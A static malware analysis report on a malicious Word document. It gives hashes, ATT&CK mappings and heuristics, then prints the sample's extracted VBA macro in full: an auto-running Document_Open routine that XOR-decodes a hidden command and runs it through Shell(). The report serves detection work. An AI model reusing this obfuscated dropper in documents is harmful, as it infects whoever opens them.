Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 61ae279c6ec24582…

MALICIOUS

Office (OLE)

492.5 KB Created: 2018-01-26 11:59:00 Authoring application: Microsoft Office Word First seen: 2018-02-07
MD5: ca0583864570b67f6480bb3078bb1d7a SHA-1: 55f3c5532248648cf205813142f856049e75e821 SHA-256: 61ae279c6ec245824d229bace8c4847c9f02f47f3d2191e566bce0aac025ebc0
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample contains a VBA macro that is automatically executed upon opening the document. This macro utilizes the Shell() function to execute a deobfuscated command, which is likely a second-stage payload. The deobfuscated command is constructed by XORing an array of integers with a key derived from document variables, resulting in the execution of an external process.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1565 bytes
SHA-256: a1df33e2d30340f4a7ad994ed32978428d056d2e8b39d699f15a6cb71848a1f4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If ActiveDocument.Variables("wYmdIG").Value <> "toto" Then
DdvoqmBPRv
ActiveDocument.Variables("wYmdIG").Value = "toto"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub


Attribute VB_Name = "XKXSCiJ"
Private Function TTodQNRDxC(FCYyMCLAff As Variant, UwaDuZjwQY As Integer)
Dim TszWehbFFL, EaDLfqaOZz As String, mRkCLAVTkW, zPpIPKCPru
EaDLfqaOZz = ActiveDocument.Variables("wYmdIG").Value()
TszWehbFFL = ""
mRkCLAVTkW = 1
While mRkCLAVTkW < UBound(FCYyMCLAff) + 2
zPpIPKCPru = mRkCLAVTkW Mod Len(EaDLfqaOZz): If zPpIPKCPru = 0 Then zPpIPKCPru = Len(EaDLfqaOZz)
TszWehbFFL = TszWehbFFL + Chr(Asc(Mid(EaDLfqaOZz, zPpIPKCPru + UwaDuZjwQY, 1)) Xor CInt(FCYyMCLAff(mRkCLAVTkW - 1)))
mRkCLAVTkW = mRkCLAVTkW + 1
Wend
TTodQNRDxC = TszWehbFFL
End Function
Public Function DdvoqmBPRv() As Variant
Dim JXv As String
JXv = TTodQNRDxC(Array(4, 79, 55, 56, 36, 43, 80, 37, 38, 33, 11, 38, 1, 57, 62, 50, 44, 88, 84, 57, 30, _
74, 47, 28, 83, 104, 28, 60, 80, 74, 38, 71, 58, 34, 9, 108, 74, 90, 3, 58, 70, _
28, 30, 24, 28, 61, 28, 59, 29, 56, 8, 18, 66, 15, 37, 91, 17, 38, 18, 18, 94, _
3, 63, 53, 106, 4, 80, 80, 90, 90, 61, 27, 54, 5, 23), 0)
Dim RetVal
RetVal = Shell(JXv, 0)
End Function